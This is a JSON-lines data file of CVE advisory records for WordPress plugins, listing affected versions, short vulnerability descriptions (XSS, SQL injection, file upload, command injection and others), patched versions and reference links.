{"CVE_ID":"CVE-2023-4022","slug":"mwp-herd-effect","versionEndExcluding":"5.2.3","description":"The Herd Effects WordPress plugin before 5.2.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c4ac0b19-58b1-4620-b3b7-fbe6dd6c8dd5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c4ac0b19-58b1-4620-b3b7-fbe6dd6c8dd5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"mwp-herd-effect","versionEndExcluding":"5.2.2","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12408","slug":"wp-migrate-2-aws","versionImpact":"5.2.1","versionEndExcluding":"5.2.2","description":"The WP on AWS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_POST data in all versions up to, and including, 5.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209870%40wp-migrate-2-aws&new=3209870%40wp-migrate-2-aws&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209870%40wp-migrate-2-aws&new=3209870%40wp-migrate-2-aws&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c82dc37-0b9a-48c2-a8a6-fbee6182003f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c82dc37-0b9a-48c2-a8a6-fbee6182003f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10793","slug":"wp-security-audit-log","versionImpact":"5.2.1","versionEndExcluding":"5.2.2","description":"The WP Activity Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user_id parameter in all versions up to, and including, 5.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrative user accesses an injected page.","recommendation":"Update to version 5.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44f3b2e4-c537-4369-b2d6-39fbc6cb8e08?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44f3b2e4-c537-4369-b2d6-39fbc6cb8e08?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/tags\\\/5.2.1\\\/classes\\\/WPSensors\\\/class-wp-system-sensor.php#L679\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/tags\\\/5.2.1\\\/classes\\\/WPSensors\\\/class-wp-system-sensor.php#L679\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13534","slug":"small-package-quotes-wwe-edition","versionImpact":"5.2.18","versionEndExcluding":"5.2.19","description":"The Small Package Quotes \u2013 Worldwide Express Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 5.2.18 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.2.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3241919%40small-package-quotes-wwe-edition&new=3241919%40small-package-quotes-wwe-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3241919%40small-package-quotes-wwe-edition&new=3241919%40small-package-quotes-wwe-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0235347-75ef-458e-97ec-bb9b00e1f9de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0235347-75ef-458e-97ec-bb9b00e1f9de?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13333","slug":"file-manager-advanced","versionImpact":"5.2.13","versionEndExcluding":"5.2.14","description":"The Advanced File Manager plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'fma_local_file_system' function in versions 5.2.12 to 5.2.13. This makes it possible for authenticated attackers, with Subscriber-level access and above and upload permissions granted by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. The function can be exploited only if the \"Display .htaccess?\" setting is enabled.","recommendation":"Update to version 5.2.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php?rev=3200092#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php?rev=3200092#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222740\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222740\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c8bcbf8-1848-4f7a-89d8-5894de0bb18b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c8bcbf8-1848-4f7a-89d8-5894de0bb18b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11391","slug":"file-manager-advanced","versionImpact":"5.2.10","versionEndExcluding":"5.2.11","description":"The Advanced File Manager plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation via the 'class_fma_connector.php' file in all versions up to, and including, 5.2.10. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted permissions by an Administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 5.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199242\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199242\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f14a658c-1517-4af4-8bd7-c379ac07ab35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f14a658c-1517-4af4-8bd7-c379ac07ab35?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2499","slug":"custom-registration-form-builder-with-submission-manager","versionEndExcluding":"5.2.1.1","description":"The RegistrationMagic plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.2.1.0. This is due to insufficient verification on the user being supplied during a Google social login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/5.2.0.4\\\/services\\\/class_rm_user_services.php#L791\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/5.2.0.4\\\/services\\\/class_rm_user_services.php#L791\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87ec5542-b6e7-4b18-a3ec-c258e749d32e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87ec5542-b6e7-4b18-a3ec-c258e749d32e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2912481%40custom-registration-form-builder-with-submission-manager&new=2912481%40custom-registration-form-builder-with-submission-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2912481%40custom-registration-form-builder-with-submission-manager&new=2912481%40custom-registration-form-builder-with-submission-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2548","slug":"custom-registration-form-builder-with-submission-manager","versionEndExcluding":"5.2.1.0","description":"The RegistrationMagic plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 5.2.0.5. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for authenticated attackers, with administrator-level permissions and above, to change user passwords and potentially take over super-administrator accounts in multisite setup.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfbc406b-49af-419e-adeb-0510794b7e3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfbc406b-49af-419e-adeb-0510794b7e3f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/5.2.0.5\\\/includes\\\/class_rm_utilities.php#L3044\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-registration-form-builder-with-submission-manager\\\/tags\\\/5.2.0.5\\\/includes\\\/class_rm_utilities.php#L3044\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9651","slug":"fluentform","versionImpact":"5.2.0","versionEndExcluding":"5.2.1","description":"The Fluent Forms  WordPress plugin before 5.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2c56e42-3b3a-4e23-933f-40cf63e222c0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2c56e42-3b3a-4e23-933f-40cf63e222c0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6420","slug":"hide-my-wp","versionImpact":"5.2.01","versionEndExcluding":"5.2.02","description":"The Hide My WP Ghost  WordPress plugin before 5.2.02 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.","recommendation":"Update to version 5.2.02, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfda6577-81aa-4397-a2d6-1d736f9ebd44\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfda6577-81aa-4397-a2d6-1d736f9ebd44\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36699","slug":"quick-pagepost-redirect-plugin","versionEndExcluding":"5.2.0","description":"The Quick Page\/Post Redirect Plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on the qppr_save_quick_redirect_ajax and qppr_delete_quick_redirect functions in versions up to, and including, 5.1.9. This makes it possible for low-privileged attackers to interact with the plugin settings and to create a redirect link that would forward all traffic to an external malicious website.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/authenticated-settings-change-vulnerability-in-wordpress-quick-page-post-redirect-plugin-unpatched\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/authenticated-settings-change-vulnerability-in-wordpress-quick-page-post-redirect-plugin-unpatched\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-quick-page-post-redirect-security-bypass-5-1-9\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-quick-page-post-redirect-security-bypass-5-1-9\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11c4b855-8589-4ad2-b414-566ac8eb4632?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11c4b855-8589-4ad2-b414-566ac8eb4632?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10198\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10198\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13415","slug":"tlp-food-menu","versionImpact":"5.1.4","versionEndExcluding":"5.2.0","description":"The Food Menu \u2013 Restaurant Menu & Online Ordering for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the response() function in all versions up to, and including, 5.1.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the plugin's settings.","recommendation":"Update to version 5.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/tlp-food-menu\\\/tags\\\/5.1.4\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Settings.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/tlp-food-menu\\\/tags\\\/5.1.4\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3231030%40tlp-food-menu&new=3231030%40tlp-food-menu&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3231030%40tlp-food-menu&new=3231030%40tlp-food-menu&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab6dd645-8831-49bc-b6b1-bb153ef79204?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab6dd645-8831-49bc-b6b1-bb153ef79204?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3284","slug":"user-registration-pro","versionImpact":"5.1.3","versionEndExcluding":"5.2.0","description":"The User Registration & Membership \u2013 Custom Registration Form, Login Form, and User Profile plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.1.3. This is due to missing or incorrect nonce validation on the user_registration_pro_delete_account() function. This makes it possible for unauthenticated attackers to force delete users, including administrators, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpuserregistration.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wpuserregistration.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4616b609-e8dc-4004-a5b7-2de3e83719be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4616b609-e8dc-4004-a5b7-2de3e83719be?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25224","slug":"wp-database-backup","versionEndExcluding":"5.2","description":"The WP Database Backup plugin for WordPress is vulnerable to OS Command Injection in versions before 5.2 via the mysqldump function. This vulnerability allows unauthenticated attackers to execute arbitrary commands on the host operating system.","recommendation":"Update to version 5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/blog.sucuri.net\\\/2019\\\/06\\\/os-command-injection-in-wp-database-backup.html\",\"name\":\"https:\\\/\\\/blog.sucuri.net\\\/2019\\\/06\\\/os-command-injection-in-wp-database-backup.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/153781\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/153781\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2078035\\\/wp-database-backup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2078035\\\/wp-database-backup\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_db_backup_rce.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_db_backup_rce.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2019\\\/05\\\/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2019\\\/05\\\/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21cf285-9d75-43a2-9e81-67116f0bf896?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21cf285-9d75-43a2-9e81-67116f0bf896?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1402","slug":"event-tickets","versionImpact":"5.19.1.1","versionEndExcluding":"5.19.1.2","description":"The Event Tickets and Registration plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'ajax_ticket_delete' function in all versions up to, and including, 5.19.1.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary Attendee tickets.","recommendation":"Update to version 5.19.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-tickets\\\/tags\\\/5.18.1\\\/src\\\/Tribe\\\/Assets.php#L202\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-tickets\\\/tags\\\/5.18.1\\\/src\\\/Tribe\\\/Assets.php#L202\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-tickets\\\/tags\\\/5.18.1\\\/src\\\/Tribe\\\/Metabox.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-tickets\\\/tags\\\/5.18.1\\\/src\\\/Tribe\\\/Metabox.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-tickets\\\/tags\\\/5.18.1\\\/src\\\/Tribe\\\/Metabox.php#L490\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-tickets\\\/tags\\\/5.18.1\\\/src\\\/Tribe\\\/Metabox.php#L490\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordfence.freshdesk.com\\\/a\\\/tickets\\\/375051\",\"name\":\"https:\\\/\\\/wordfence.freshdesk.com\\\/a\\\/tickets\\\/375051\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbd838b6-7792-4378-8969-a70c6e16ff6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbd838b6-7792-4378-8969-a70c6e16ff6a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13457","slug":"event-tickets","versionImpact":"5.18.1","versionEndExcluding":"5.18.1.1","description":"The Event Tickets and Registration plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.18.1 via the tc-order-id parameter due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to view order details of orders they did not place, which includes ticket prices, user emails and order date.","recommendation":"Update to version 5.18.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3229935%40event-tickets%2Ftags%2F5.18.1.1&old=3227011%40event-tickets%2Ftags%2F5.18.1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3229935%40event-tickets%2Ftags%2F5.18.1.1&old=3227011%40event-tickets%2Ftags%2F5.18.1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cc2261a-889e-40ec-8382-48de65b91b34?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cc2261a-889e-40ec-8382-48de65b91b34?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0079","slug":"customer-reviews-woocommerce","versionImpact":"5.16.0","versionEndExcluding":"5.17.0","description":"The Customer Reviews for WooCommerce WordPress plugin before 5.17.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 5.17.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdaba4d1-950d-4512-95de-cd43fe9e73e5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdaba4d1-950d-4512-95de-cd43fe9e73e5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12421","slug":"woo-coupon-usage","versionImpact":"5.16.7.1","versionEndExcluding":"5.16.7.2","description":"The The Coupon Affiliates \u2013 Affiliate Plugin for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.16.7.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. This functionality is also vulnerable to Reflected Cross-Site Scripting. The Cross-Site Scripting was patched in version 5.16.7.1, while the arbitrary shortcode execution was patched in 5.16.7.2.","recommendation":"Update to version 5.16.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-coupon-usage\\\/tags\\\/5.16.7\\\/inc\\\/functions\\\/functions-user-coupons.php#L491\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-coupon-usage\\\/tags\\\/5.16.7\\\/inc\\\/functions\\\/functions-user-coupons.php#L491\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207070%40woo-coupon-usage&new=3207070%40woo-coupon-usage&sfp_email=&sfph_mail=#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207070%40woo-coupon-usage&new=3207070%40woo-coupon-usage&sfp_email=&sfph_mail=#file7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66b669ce-142a-48b8-9adf-620657c2db74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66b669ce-142a-48b8-9adf-620657c2db74?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0080","slug":"customer-reviews-woocommerce","versionEndExcluding":"5.16.0","description":"The Customer Reviews for WooCommerce WordPress plugin before 5.16.0 does not validate one of its shortcode attribute, which could allow users with a contributor role and above to include arbitrary files via a traversal attack. This could also allow them to read non PHP files and retrieve their content. RCE could also be achieved if the attacker manage to upload a malicious image containing PHP code, and then include it via the affected attribute, on a default WP install, authors could easily achieve that given that they have the upload_file capability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b0d63ed-e244-4f20-8f10-a6e0c7ccadd4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b0d63ed-e244-4f20-8f10-a6e0c7ccadd4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1206","slug":"adrotate","versionImpact":"5.13.2","versionEndExcluding":"5.13.3","description":"The AdRotate Banner Manager \u2013 The only ad manager you'll need plugin for WordPress is vulnerable to arbitrary file uploads due to missing file extension sanitization in the adrotate_insert_media() function in all versions up to, and including, 5.13.2. This makes it possible for authenticated attackers, with administrator-level access and above, to upload arbitrary files with double extensions on the affected site's server which may make remote code execution possible. This is only exploitable on select instances where the configuration will execute the first extension present.","recommendation":"Update to version 5.13.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f92219a-e07e-422d-a9f2-dbe4fbcd5f55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f92219a-e07e-422d-a9f2-dbe4fbcd5f55?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adrotate\\\/trunk\\\/adrotate-admin-manage.php#L418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adrotate\\\/trunk\\\/adrotate-admin-manage.php#L418\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0911","slug":"shortcodes-ultimate","versionEndExcluding":"5.12.8","description":"The WordPress Shortcodes Plugin \u2014 Shortcodes Ultimate WordPress plugin before 5.12.8 does not validate the user meta to be retrieved via the user shortcode, allowing any authenticated users such as subscriber to retrieve arbitrary user meta (except the user_pass), such as the user email and activation key by default.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35404d16-7213-4293-ac0d-926bd6c17444\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35404d16-7213-4293-ac0d-926bd6c17444\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0890","slug":"shortcodes-ultimate","versionEndExcluding":"5.12.8","description":"The WordPress Shortcodes Plugin \u2014 Shortcodes Ultimate WordPress plugin before 5.12.8 does not ensure that posts to be displayed via some shortcodes are already public and can be accessed by the user making the request, allowing any authenticated users such as subscriber to view draft, private or even password protected posts. It is also possible to leak the password of protected posts","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a466f15-f112-4527-8b02-4544a8032671\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a466f15-f112-4527-8b02-4544a8032671\",\"refsource\":\"MISC\",\"tags\":[]}]"}
